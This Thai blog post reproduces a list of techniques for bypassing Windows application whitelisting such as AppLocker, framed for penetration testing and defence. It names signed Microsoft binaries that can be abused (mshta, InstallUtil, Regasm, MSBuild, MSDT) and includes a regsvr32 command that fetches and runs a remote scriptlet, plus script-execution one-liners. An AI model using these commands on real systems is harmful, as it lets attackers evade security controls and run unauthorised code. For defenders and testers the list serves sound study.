วิธีการ bypass whitelist application โดยวิธีต่างๆ
SubTee สุดยอดนักหาวิธีการ bypass Application Whitelist(เช่น การป้องกันการรันโปรแกรมโดยใช้ AppLocker เป็นต้น) ได้ทำสรุปวิธีการ bypass ต่างๆไว้ใน Github สามารถไปติดตามกันได้เลยครับ บอกได้เลยว่าแต่ละวิธีแจ่มๆทั้งนั้น เรียนรู้เพื่อทั้งสำหรับการทำ Penetration testing และสำหรับการป้องกัน Protection ด้วยครับ
Source:: SubTee Github
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
# The List # # As many organizations adopt a Whitelisting Strategy, this list seeks to compile known bypass techniques that can be used # by the security community. # # There are many various ways to WhiteList Applications # Future release will attempt to catalog what works against specific techniques. # Version .0.0.3 1. IEExec This technique may work in certain environments. Its relies on the fact that many organizations trust executables signed by Microsoft. We can misuse this trust by launching a specially crafted .NET application. Example Here: http://www.room362.com/blog/2014/01/16/application-whitelist-bypass-using-ieexec-dot-exe/ 2. Rundll32.exe 3. ClickOnce Applications dfsvc.exe dfshim.dll 4. XBAP - XML Browser Applications WPF PresentationHost.exe 5. MD5 Hash Collision http://www.mathstat.dal.ca/~selinger/md5collision/ 6. PowerShell Specifically Reflective Execution http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ https://www.defcon.org/images/defcon-21/dc-21-presentations/Bialek/DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf 7. .HTA Application Invoke PowerShell Scripts Launched by mshta.exe, bypasses IE security settings as well. 8. bat, vbs, ps1 1. cmd.exe /k < script.txt 2. cscript.exe //E:vbscript script.txt 3. Get-Content script.txt | iex 9. Malicious Troubleshooting packs - MSDT.exe Reference: http://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ Thanks to @nberthaume, @Killswitch_GUI 10. InstallUtil.exe A signed MS binary that loads assemblies and executes - One of the best. Examples here: https://gist.github.com/subTee 11. Regsvcs/Regasm See: https://gist.github.com/subTee/fb09ef511e592e6f7993 These 2 are Excellent. 12. regsvr32.exe https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302 This one is just simply amazing... regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll 13. Msbuild.exe http://subt0x10.blogspot.com/2016/09/bypassing-application-whitelisting.html |